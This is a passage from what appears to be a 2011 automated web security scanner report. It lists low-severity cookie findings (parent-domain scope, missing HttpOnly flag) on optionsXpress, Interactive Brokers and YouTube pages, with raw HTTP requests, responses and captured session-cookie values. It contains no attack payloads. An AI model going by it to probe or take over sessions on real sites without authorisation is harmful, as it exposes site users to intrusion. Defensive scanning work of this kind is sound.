Host:   http://www.optionsxpress.com
Path:   /promos/none

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/none HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D05DC917430831B031060D84F9F27197; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:45 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.100. http://www.optionsxpress.com/security_risks/disclosures.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/disclosures.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/disclosures.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41170
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FED853FE416DB0F03FEDDCB469A9145C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.101. http://www.optionsxpress.com/security_risks/docs/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/docs/privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/docs/privacy.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=4C2659034820370B6A9DFB9CB9AA0744; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.102. http://www.optionsxpress.com/security_risks/financial_statement.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/financial_statement.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/financial_statement.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=65005755437004387D7FFBBE530F7372; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:41 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.103. http://www.optionsxpress.com/security_risks/risks_policies.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/risks_policies.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/risks_policies.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19725
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=DB249C1A430D3C4503D85E86687565CD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.104. http://www.optionsxpress.com/security_risks/security_center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/security_center.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/security_center.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15926
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=E2BEAFED437171EB820D4E98385DB156; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.105. http://www.optionsxpress.com/tools_research/ox_mobile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/ox_mobile.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/ox_mobile.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15747
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FD7A328447D092AF8488C6A5531FE92B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.106. http://www.optionsxpress.com/tools_research/powerful_tools.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/powerful_tools.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/powerful_tools.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=2E2574AB41F5BC605C9F9897C3432558; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.107. http://www.optionsxpress.com/tools_research/xtend_2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/xtend_2.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/xtend_2.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15806
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3E3E48CF4431C4E5425025B2B98DADD9; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.108. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /what_we_offer/free_account_transfers.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /what_we_offer/free_account_transfers.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15093
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=ECD9E2464BC899B5DEA91BB4AFEB72A7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:43 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.109. http://www.optionsxpress.com/why_ox/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /why_ox/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why_ox/ HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23885
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3CFE0203443873E7E1112FA21AEBCE4E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.110. https://www.optionsxpress.com/downloads/financial_services_guide.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /downloads/financial_services_guide.pdf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /downloads/financial_services_guide.pdf HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 18626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: TLTHID=D480F472402E51465C012E9BFA1894F1; Path=/; Domain=.optionsxpress.com
HostName: DAWEB29
Set-Cookie: TLTCNT=DAWEB290000000000191854
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title value="WC@FIRMNAME">optionsXpress | We're sorry but that request canno
...[SNIP]...

9.111. https://www.optionsxpress.com/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /login.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:54 GMT
Location: https://www.optionsxpress.com/login.asp?r=1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1B1DD000453D0D2ED80148A6B79D7F5A; Path=/; Domain=.optionsxpress.com
HostName: DAWEB23
Set-Cookie: TLTCNT=DAWEB230000000000085881
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.optionsxpress.com/login.asp?r=1">here</a>.</body>

9.112. https://www.optionsxpress.com/welcome.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


9.113. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:53 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=cfbdccd9bf80df90c1b6157efb90bfb7cwsAAAAzVVMyF3tqTmkbrQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pUVNrNDJCdG9CVTBISXc2OTNYTFVNSS02YXJpWlk1VHh2LXFXVXZiazg1QkgyREs0cjIwc29R -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

10. Cookie without HttpOnly flag set  previous  next
There are 148 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://pixel.everesttech.net/2164/cq  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

10.2. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Universal/servlet/AccountAccess.Login HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:10 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D24B4AC443B91EEF9FD5C3E648B0EBBA.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=FA1637BB4C1210749D198C9C6CCCF2EA.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16505
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

10.3. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Universal/servlet/AccountAccess.Logout HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:11 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A55CBF6DD6AC2BCEDB63CB76F1C14DC5.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=BCEA933607F5BEC843FF7E88BA2DBC25.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=56A61A82D2AFCE5A9F25ACEB787F17D3.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16505
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

10.4. https://www.interactivebrokers.com/Universal/servlet/Registration_v3.formScreenPreReg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/Registration_v3.formScreenPreReg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Universal/servlet/Registration_v3.formScreenPreReg HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:49:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9EFAFD90AB6C579C982FF58ACD7FDDB3.www3; Path=/Universal; Secure
Content-Language: en-US
Content-Length: 77915
Connection: close
Content-Type: text/html;charset=UTF-8


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

10.5. https://www.interactivebrokers.com/Universal/servlet/formWelcome  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/formWelcome

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Universal/servlet/formWelcome?p=100&atype=IT&b=T&ft=ft1 HTTP/1.1
Host: www.interactivebrokers.com
Connection: keep-alive
Referer: http://www.interactivebrokers.com/en/p.php?f=individualAccounts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:37:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4FB23AA05D9909D5450906B08631151D.www3; Path=/Universal; Secure
Content-Language: en-US
Content-Length: 78633
Connection: close
Content-Type: text/html;charset=UTF-8


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

10.6. https://www.interactivebrokers.com/sso/Authenticator  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Authenticator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sso/Authenticator?91146 HTTP/1.1
Host: www.interactivebrokers.com
Connection: keep-alive
Referer: https://www.interactivebrokers.com/sso/Login
Content-Length: 339
Origin: https://www.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B63C36F91C020C4B017188CC1EF896E3.wwwsso3; ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

ACTION=COMPLETEAUTH&USER=xss&ACCT=&M1=4529e29cf6687577dfafe2960e6747bca9c1f0a2&EKX=1d7627dc32b950b32219f748085f166dc9960f2583a1519b88576a5b65b72bfe92fad39bbe74759b23095a7e6b86699d2a9ea954f0468f59ce872
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:53:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=1BA8E2DE88E2128104867CFC6671D3E8.wwwsso3; Path=/sso; Secure
Content-Length: 70
Connection: close
Content-Type: text/xml

<ib_auth_res>
<ini_params>
<M2>null</M2>
</ini_params>
</ib_auth_res>

10.7. https://www.interactivebrokers.com/sso/Login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sso/Login?forwardTo=1 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:03 GMT
Server: Apache
Pragma: no-cache
